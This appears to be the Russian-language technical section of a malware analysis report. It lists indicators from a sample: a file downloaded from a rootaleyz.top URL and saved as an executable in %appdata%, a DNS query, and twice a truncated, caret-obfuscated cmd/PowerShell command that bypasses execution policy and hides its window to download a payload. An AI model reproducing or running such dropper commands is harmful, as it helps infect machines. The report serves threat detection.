Техническая информация
- http://rootaleyz.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^We^Rs^HE^lL.^exe^ -Execu^T^IoNPOlICy byPa^SS -noP^ROfILe -Windo^Wst^YLe^ ^h^iDDen (N^ew^-oBJECt^ SYSte^M^.^NET.we^B^ClIe^nt).^Do^W^NlOa^Df^IlE('http://rootaleyz.top/re...
- DNS ASK ro###leyz.top
- '<SYSTEM32>\cmd.exe' /C "Po^We^Rs^HE^lL.^exe^ -Execu^T^IoNPOlICy byPa^SS -noP^ROfILe -Windo^Wst^YLe^ ^h^iDDen (N^ew^-oBJECt^ SYSte^M^.^NET.we^B^ClIe^nt).^Do^W^NlOa^Df^IlE('http://rootaleyz.top/re...' (со скрытым окном)